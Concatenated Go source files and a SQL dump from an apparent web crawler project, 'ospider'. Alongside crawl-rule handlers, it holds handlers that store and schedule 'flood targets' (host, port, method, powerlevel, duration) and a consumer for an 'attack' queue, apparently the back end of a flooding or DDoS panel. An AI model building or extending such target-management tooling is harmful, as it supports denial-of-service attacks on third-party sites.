e.Log(gocrawl.LogAll, gocrawl.LogInfo, "response body read fails")
return nil, true
}
encoding, charset, is := charset.DetermineEncoding(body, "utf-8")
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "response charset is "+charset)
site := e.Attach["site"].(handler.Site)
var links []string
if len(site.Rule.Selector.Href) <= 0 {
site.Rule.Selector.Href = "a[href]"
}
doc.Find(site.Rule.Selector.Section).
Find(site.Rule.Selector.Href).
Each(func(i int, s *goquery.Selection) {
href, _ := s.Attr("href")
// convert the encoding
if !is {
reader := transform.NewReader(bytes.NewReader([]byte(href)), encoding.NewDecoder())
if u, err := ioutil.ReadAll(reader); err != nil {
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "io read all fails"+err.Error())
} else {
href = string(u)
}
}
// resolve relative paths
u, _ := url.Parse(href)
if !u.IsAbs() {
u.Host = ctx.URL().Host
u.Scheme = ctx.URL().Scheme
u.RawQuery = u.Query().Encode()
href = u.String()
}
if len(href) > 0 {
links = append(links, href)
}
})
e.Attach["links"] = links
return nil, true
}
func (e *ExtLink) Filter(ctx *gocrawl.URLContext, isVisited bool) bool {
return !isVisited
}
<file_sep>package handler
import (
"database/sql"
_ "github.com/go-sql-driver/mysql"
"github.com/go-martini/martini"
"github.com/huzorro/ospider/web/user"
"net/http"
"log"
"github.com/martini-contrib/sessions"
"encoding/json"
"strings"
"strconv"
"reflect"
"net/url"
"github.com/martini-contrib/render"
"github.com/huzorro/ospider/util"
"github.com/huzorro/ospider/common"
"time"
"net"
)
type FloodTarget struct {
Id int64 `json:"id"`
Uid int64 `json:"uid"`
Url string `json:"url"`
Host string `json:"host"`
Port string `json:"port"`
Method string `json:"method"`
Powerlevel int64 `json:"powerlevel"`
Time int64 `json:"time"`
Crontab Crontab `json:"Cron"`
Status int64 `json:"status"`
Uptime string `json:"uptime"`
Logtime string `json:"logtime"`
}
type FloodTargetRelation struct {
FloodTarget
user.SpStatUser
}
func GetFloodTarget(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
floodTarget FloodTarget
js []byte
spUser user.SpStatUser
con string
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = " a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
case user.GROUP_PRI_BAN:
con = " a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
default:
log.Printf("group privilege errors")
}
sqlStr := `select a.id, a.uid, a.url, a.host, a.port, a.method, a.powerlevel, a.time, a.cronid,
b.name, a.status, a.uptime, a.logtime from spider_flood_target a
left join spider_crontab b on a.cronid = b.id where ` + con + " a.id = ?"
stmtOut, err := db.Prepare(sqlStr)
if err != nil {
	log.Printf("%s", err)
	rs, _ := json.Marshal(s)
	return http.StatusOK, string(rs)
}
defer stmtOut.Close()
id, _ := strconv.Atoi(r.PostFormValue("Id"))
rows, err := stmtOut.Query(id)
if err != nil {
	log.Printf("%s", err)
	rs, _ := json.Marshal(s)
	return http.StatusOK, string(rs)
}
defer rows.Close()
if rows.Next() {
if err := rows.Scan(&floodTarget.Id, &floodTarget.Uid, &floodTarget.Url,
&floodTarget.Host, &floodTarget.Port, &floodTarget.Method,
&floodTarget.Powerlevel, &floodTarget.Time, &floodTarget.Crontab.Id, &floodTarget.Crontab.Name,
&floodTarget.Status,&floodTarget.Uptime, &floodTarget.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
}
if js, err = json.Marshal(floodTarget); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func EditfloodTarget(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
floodTarget FloodTarget
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&floodTarget).Elem()
rValue := reflect.ValueOf(&floodTarget).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknown type %s", p)
}
}
}
floodTarget.Crontab.Id, _ = strconv.ParseInt(r.PostFormValue("CronId"), 10, 64)
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `update spider_flood_target set url = ?, host = ?, cronid = ?, status = ?
where id = ? and uid = ?`
stmtIn, err := db.Prepare(sqlStr)
if err != nil {
	log.Printf("db prepare fails %s", err)
	rs, _ := json.Marshal(s)
	return http.StatusOK, string(rs)
}
defer stmtIn.Close()
if _, err = stmtIn.Exec(floodTarget.Url, floodTarget.Host, floodTarget.Crontab.Id,
floodTarget.Status, floodTarget.Id, spUser.Id); err != nil {
log.Printf("update spider fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func AddfloodTarget(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
floodTarget FloodTarget
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&floodTarget).Elem()
rValue := reflect.ValueOf(&floodTarget).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknown type %s", p)
}
}
}
if floodTarget.Url == "" || r.PostFormValue("CronId") == "" {
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if floodTarget.Host == "" {
ips, err := net.LookupIP(floodTarget.Url)
if err != nil {
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
floodTarget.Host = ips[0].String()
}
floodTarget.Crontab.Id, _ = strconv.ParseInt(r.PostFormValue("CronId"), 10, 64)
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `insert into spider_flood_target(uid, url, host, cronid, logtime)
values(?, ?, ?, ?, ?)`
stmtIn, err := db.Prepare(sqlStr)
if err != nil {
	log.Printf("db prepare fails %s", err)
	rs, _ := json.Marshal(s)
	return http.StatusOK, string(rs)
}
defer stmtIn.Close()
if _, err := stmtIn.Exec(spUser.Id, floodTarget.Url, floodTarget.Host,
floodTarget.Crontab.Id, time.Now().Format("2006-01-02 15:04:05")); err != nil {
log.Printf("stmtIn exec fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func GetfloodTargets(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
cfg *common.Cfg, session sessions.Session, ms []*user.SpStatMenu, render render.Render) {
var (
floodTargetRelation *FloodTargetRelation
floodTargetRelations []*FloodTargetRelation
menu []*user.SpStatMenu
spUser user.SpStatUser
con string
totalN int64
destPn int64
)
path := r.URL.Path
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
con = "where a.status in(0, 1, 3, 5) "
case user.GROUP_PRI_ALLOW:
con = "WHERE a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and a.status in(0, 1) "
case user.GROUP_PRI_BAN:
con = "WHERE a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and a.status in(0, 1) "
default:
log.Printf("group privilege errors")
}
for _, elem := range ms {
if (spUser.Role.Menu & elem.Id) == elem.Id {
menu = append(menu, elem)
}
}
stmtOut, err := db.Prepare("SELECT COUNT(*) FROM spider_flood_target a " + con)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
row := stmtOut.QueryRow()
if err = row.Scan(&totalN); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
// pagination
if r.URL.Query().Get("p") != "" {
destPn, _ = strconv.ParseInt(r.URL.Query().Get("p"), 10, 64)
} else {
destPn = 1
}
sqlStr := `select a.id, a.uid, b.username, a.url, a.host, a.cronid, c.name, a.status, a.logtime
from spider_flood_target a left join sp_user b on a.uid = b.id
left join spider_crontab c on a.cronid = c.id
` + con + `order by id desc limit ?, ?`
log.Printf("%s", sqlStr)
stmtOut, err = db.Prepare(sqlStr)
if err != nil {
	log.Printf("%s", err)
	http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
	return
}
defer stmtOut.Close()
rows, err := stmtOut.Query(cfg.PageSize*(destPn-1), cfg.PageSize)
if err != nil {
	log.Printf("%s", err)
	http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
	return
}
defer rows.Close()
for rows.Next() {
floodTargetRelation = &FloodTargetRelation{}
if err := rows.Scan(&floodTargetRelation.FloodTarget.Id,&floodTargetRelation.FloodTarget.Uid,
&floodTargetRelation.SpStatUser.UserName, &floodTargetRelation.FloodTarget.Url,
&floodTargetRelation.FloodTarget.Host, &floodTargetRelation.FloodTarget.Crontab.Id,
&floodTargetRelation.FloodTarget.Crontab.Name, &floodTargetRelation.FloodTarget.Status,
&floodTargetRelation.FloodTarget.Logtime); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
floodTargetRelations = append(floodTargetRelations, floodTargetRelation)
}
paginator := util.NewPaginator(r, cfg.PageSize, totalN)
ret := struct {
Menu []*user.SpStatMenu
Result []*FloodTargetRelation
Paginator *util.Paginator
User *user.SpStatUser
}{menu, floodTargetRelations, paginator, &spUser}
if path == "/" {
render.HTML(200, "floodtargetview", ret)
} else {
index := strings.LastIndex(path, "/")
render.HTML(200, path[index+1:], ret)
}
}<file_sep>package attack
import (
"fmt"
"time"
"github.com/adjust/rmq"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/spider/processor"
)
type Consumer struct {
name string
count int
before time.Time
task *Task
}
type Task struct {
Cfg processor.Cfg
common.Ospider
rmq.Connection
Processors []common.Processor
}
func NewConsumer(tag int, task *Task) *Consumer {
c := &Consumer{
name: fmt.Sprintf("consumer%d", tag),
count: 0,
before: time.Now(),
task: task,
}
return c
}
func (self *Task) AddProcessor(p common.Processor) *Task {
self.Processors = append(self.Processors, p)
return self
}
func (consumer *Consumer) Consume(delivery rmq.Delivery) {
consumer.count++
elem := delivery.Payload()
delivery.Ack()
consumer.task.Log.Printf("%s consumed %d %s", consumer.name, consumer.count, elem)
for _, p := range consumer.task.Processors {
p.Process(elem)
}
}
func (self *Task) Handler() {
var (
resultQueue rmq.Queue
)
resultQueue = self.Connection.OpenQueue(self.Cfg.AttackQueueName)
resultQueue.StartConsuming(self.Cfg.UnackedLimit, 500*time.Millisecond)
for i := 0; i < self.Cfg.NumConsumers; i++ {
name := fmt.Sprintf("consumer %d", i)
resultQueue.AddConsumer(name, NewConsumer(i, self))
}
}
<file_sep>/*
-- Query: SELECT * FROM ospider.sp_node_privilege where logtime > "2016-06"
LIMIT 0, 100
-- Date: 2016-06-20 10:06
*/
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'api添加','/floodapi/add','2016-06-20 00:55:03');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'api编辑','/floodapi/edit','2016-06-20 00:55:03');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'获取单个api','/floodapi/one','2016-06-20 00:55:03');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'api列表','/floodapiview','2016-06-20 01:07:48');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'目标添加','/floodtarget/add','2016-06-20 05:18:14');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'目标编辑','/floodtarget/edit','2016-06-20 05:18:14');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'获取单个目标','/floodtarget/one','2016-06-20 05:18:14');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'目标列表','/floodtargetview','2016-06-20 05:18:14');
<file_sep>package processor
import (
"bytes"
"io/ioutil"
"net/http"
"time"
"github.com/PuerkitoBio/gocrawl"
"github.com/PuerkitoBio/goquery"
"github.com/huzorro/ospider/web/handler"
"golang.org/x/net/html/charset"
"golang.org/x/text/transform"
"strings"
"net/url"
)
type ExtContent struct {
Cfg
*gocrawl.DefaultExtender
Attach map[string]interface{}
}
func NewSpiderContent(cfg Cfg, attach map[string]interface{}) (*gocrawl.Crawler, *ExtContent) {
//attach := make(map[string]interface{})
ext := &ExtContent{cfg, &gocrawl.DefaultExtender{}, attach}
// Set custom options
opts := gocrawl.NewOptions(ext)
opts.CrawlDelay = 1 * time.Second
opts.LogFlags = gocrawl.LogAll
opts.SameHostOnly = true
opts.MaxVisits = cfg.MaxVisits
opts.UserAgent = cfg.UserAgent
return gocrawl.NewCrawlerWithOptions(opts), ext
}
func (e *ExtContent) Visit(ctx *gocrawl.URLContext, res *http.Response, doc *goquery.Document) (interface{}, bool) {
// detect the response charset
var (
body []byte
err error
htmls = make([]string, 0)
)
if body, err = ioutil.ReadAll(res.Body); err != nil {
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "response body read fails")
return nil, true
}
encoding, charset, is := charset.DetermineEncoding(body, "utf-8")
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "response charset is " + charset)
site := e.Attach["site"].(handler.Site)
site.Rule.Selector.Title = doc.Find(site.Rule.Selector.Title).Text()
// convert the encoding
if !is {
reader := transform.NewReader(bytes.NewReader([]byte(site.Rule.Selector.Title)), encoding.NewDecoder())
if u, err := ioutil.ReadAll(reader); err != nil {
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "io read all fails"+err.Error())
} else {
site.Rule.Selector.Title = string(u)
}
}
if len(site.Rule.Selector.Filter) > 0 {
doc.Find(site.Rule.Selector.Content).
Not(site.Rule.Selector.Filter).
Each(func(i int, q *goquery.Selection){
shtml, _ := q.Html()
htmls = append(htmls, shtml)
})
} else {
doc.Find(site.Rule.Selector.Content).
Each(func(i int, q *goquery.Selection){
shtml, _ := q.Html()
htmls = append(htmls, shtml)
})
}
site.Rule.Selector.Content = strings.Join(htmls, "<br/>")
// convert the encoding
if !is {
reader := transform.NewReader(bytes.NewReader([]byte(site.Rule.Selector.Content)), encoding.NewDecoder())
if u, err := ioutil.ReadAll(reader); err != nil {
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "io read all fails"+err.Error())
} else {
site.Rule.Selector.Content = string(u)
}
}
// fix relative img src paths
sub, _ := goquery.NewDocumentFromReader(bytes.NewReader([]byte(strings.Join(htmls, ""))))
sub.Find("img").Each(func(i int, q *goquery.Selection) {
src, _ := q.Attr("src")
u, _ := url.Parse(src)
if !u.IsAbs() {
u.Host = ctx.URL().Host
u.Scheme = ctx.URL().Scheme
u.RawQuery = u.Query().Encode()
dest := u.String()
site.Rule.Selector.Content = strings.Replace(site.Rule.Selector.Content, src, dest, -1)
}
})
e.Attach["site"] = site
return nil, true
}
func (e *ExtContent) Filter(ctx *gocrawl.URLContext, isVisited bool) bool {
return !isVisited
}
<file_sep>package handler
import (
"database/sql"
_ "github.com/go-sql-driver/mysql"
"github.com/go-martini/martini"
"github.com/huzorro/ospider/web/user"
"net/http"
"log"
"github.com/martini-contrib/sessions"
"encoding/json"
"strings"
"strconv"
"reflect"
"net/url"
"github.com/martini-contrib/render"
"github.com/huzorro/ospider/util"
"time"
"github.com/huzorro/ospider/common"
)
type Selector struct {
Title string `json:"title"`
Content string `json:"content"`
Section string `json:"section"`
Href string `json:"href"`
Filter string `json:"filter"`
}
type Rule struct {
Id int64 `json:"id"`
Uid int64 `json:"uid"`
Name string `json:"name"`
SpiderId int64 `json:"spiderid"`
Manager Manager `json:"manager"`
Url string `json:"url"`
Selector Selector `json:"selector"`
SelectorStr string `json:"selectorStr"`
Status int64 `json:"status"`
Logtime string `json:"logtime"`
}
type RuleRelation struct {
Rule
user.SpStatUser
}
func GetRulesApi(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
spUser user.SpStatUser
rule Rule
rules []Rule
js []byte
con string
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = "WHERE uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and status = 1"
case user.GROUP_PRI_BAN:
con = "WHERE uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and status = 1"
default:
log.Printf("group privilege errors")
}
sqlStr := `select id, uid, name, spiderid, url, rule_json,status, logtime from spider_rule ` + con
stmtOut, err := db.Prepare(sqlStr)
if err != nil {
	log.Printf("%s", err)
	rs, _ := json.Marshal(s)
	return http.StatusOK, string(rs)
}
defer stmtOut.Close()
rows, err := stmtOut.Query()
if err != nil {
	log.Printf("%s", err)
	rs, _ := json.Marshal(s)
	return http.StatusOK, string(rs)
}
defer rows.Close()
for rows.Next() {
if err := rows.Scan(&rule.Id, &rule.Uid, &rule.Name,
&rule.SpiderId, &rule.Url, &rule.SelectorStr, &rule.Status, &rule.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
if err := json.Unmarshal([]byte(rule.SelectorStr), &rule.Selector); err != nil {
log.Printf("json Unmarshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
rules = append(rules, rule)
}
if js, err = json.Marshal(rules); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func GetRule(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
rule Rule
js []byte
spUser user.SpStatUser
con string
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = " a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
case user.GROUP_PRI_BAN:
con = " a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
default:
log.Printf("group privilege errors")
}
sqlStr := `select a.id, a.uid, a.name, a.spiderid, c.name, a.url, a.rule_json, a.status, a.logtime
from spider_rule a left join spider_manager c on a.spiderid = c.id where ` +
con + " a.id = ?"
stmtOut, err := db.Prepare(sqlStr)
if err != nil {
	log.Printf("%s", err)
	rs, _ := json.Marshal(s)
	return http.StatusOK, string(rs)
}
defer stmtOut.Close()
id, _ := strconv.Atoi(r.PostFormValue("Id"))
rows, err := stmtOut.Query(id)
if err != nil {
	log.Printf("%s", err)
	rs, _ := json.Marshal(s)
	return http.StatusOK, string(rs)
}
defer rows.Close()
if rows.Next() {
if err := rows.Scan(&rule.Id, &rule.Uid, &rule.Name,&rule.SpiderId, &rule.Manager.Name, &rule.Url,
&rule.SelectorStr, &rule.Status, &rule.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
if err := json.Unmarshal([]byte(rule.SelectorStr), &rule.Selector); err != nil {
log.Printf("json Unmarshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
}
if js, err = json.Marshal(rule); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func EditRule(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
rule Rule
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&rule).Elem()
rValue := reflect.ValueOf(&rule).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknown type %s", p)
}
}
}
rule.Selector.Title, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Title")))
rule.Selector.Content, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Content")))
rule.Selector.Section, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Section")))
rule.Selector.Href, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Href")))
rule.Selector.Filter, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Filter")))
if len(rule.Selector.Title) <= 0 || len(rule.Selector.Content) <= 0 || len(rule.Selector.Section) <= 0 ||
len(rule.Name) <= 0 || len(rule.Url) <= 0 {
log.Printf("post form value [%s] is empty", "Title/Content/Section/Name/Url")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `update spider_rule set name = ?, spiderid = ?, url = ?,
rule_json = ?, status = ? where id = ? and uid = ?`
stmtIn, err := db.Prepare(sqlStr)
if err != nil {
	log.Printf("db prepare fails %s", err)
	rs, _ := json.Marshal(s)
	return http.StatusOK, string(rs)
}
defer stmtIn.Close()
if js, err = json.Marshal(rule.Selector); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if _, err = stmtIn.Exec(rule.Name, rule.SpiderId, rule.Url, js,
rule.Status, rule.Id, spUser.Id); err != nil {
log.Printf("update spider rule fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func AddRule(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
rule Rule
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&rule).Elem()
rValue := reflect.ValueOf(&rule).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknown type %s", p)
}
}
}
rule.Selector.Title, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Title")))
rule.Selector.Content, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Content")))
rule.Selector.Section, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Section")))
rule.Selector.Href, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Href")))
rule.Selector.Filter, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Filter")))
if len(rule.Selector.Title) <= 0 || len(rule.Selector.Content) <= 0 || len(rule.Selector.Section) <= 0 ||
len(rule.Name) <= 0 || len(rule.Url) <= 0 {
log.Printf("post form value [%s] is empty", "Title//Content//Section//Name//Url//Charset")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `insert into spider_rule (uid, name, spiderid, url, rule_json, logtime)
values(?, ?, ?, ?, ?, ?)`
stmtIn, err := db.Prepare(sqlStr)
if err != nil {
log.Printf("db prepare fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
defer stmtIn.Close()
if js, err = json.Marshal(rule.Selector); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if _, err := stmtIn.Exec(spUser.Id, rule.Name, rule.SpiderId, rule.Url, js,
time.Now().Format("2006-01-02 15:04:05")); err != nil {
log.Printf("stmtIn exec fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func GetRules(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
cfg *common.Cfg, session sessions.Session, ms []*user.SpStatMenu, render render.Render) {
var (
ruleRelation *RuleRelation
ruleRelations []*RuleRelation
menu []*user.SpStatMenu
spUser user.SpStatUser
con string
totalN int64
destPn int64
)
path := r.URL.Path
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session store type error")
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = "WHERE a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ")"
case user.GROUP_PRI_BAN:
con = "WHERE a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ")"
default:
log.Printf("group privilege error")
}
for _, elem := range ms {
if (spUser.Role.Menu & elem.Id) == elem.Id {
menu = append(menu, elem)
}
}
stmtOut, err := db.Prepare("SELECT COUNT(*) FROM spider_rule a " + con)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
row := stmtOut.QueryRow()
if err = row.Scan(&totalN); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
//page
if r.URL.Query().Get("p") != "" {
destPn, _ = strconv.ParseInt(r.URL.Query().Get("p"), 10, 64)
} else {
destPn = 1
}
sqlStr := `select a.id, a.uid, b.username, a.name, a.spiderid, c.name, a.url, a.rule_json, a.status, a.logtime
from spider_rule a left join sp_user b on a.uid = b.id
left join spider_manager c on a.spiderid = c.id
` + con + ` order by id desc limit ?, ?`
log.Printf("%s", sqlStr)
stmtOut, err = db.Prepare(sqlStr)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
defer stmtOut.Close()
rows, err := stmtOut.Query(cfg.PageSize*(destPn-1), cfg.PageSize)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
defer rows.Close()
for rows.Next() {
ruleRelation = &RuleRelation{}
if err := rows.Scan(&ruleRelation.Rule.Id,&ruleRelation.Rule.Uid,
&ruleRelation.SpStatUser.UserName, &ruleRelation.Rule.Name,
&ruleRelation.Rule.SpiderId, &ruleRelation.Rule.Manager.Name,
&ruleRelation.Rule.Url, &ruleRelation.Rule.SelectorStr,
&ruleRelation.Rule.Status, &ruleRelation.Rule.Logtime); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
if err := json.Unmarshal([]byte(ruleRelation.Rule.SelectorStr), &ruleRelation.Rule.Selector); err != nil {
log.Printf("%s", err)
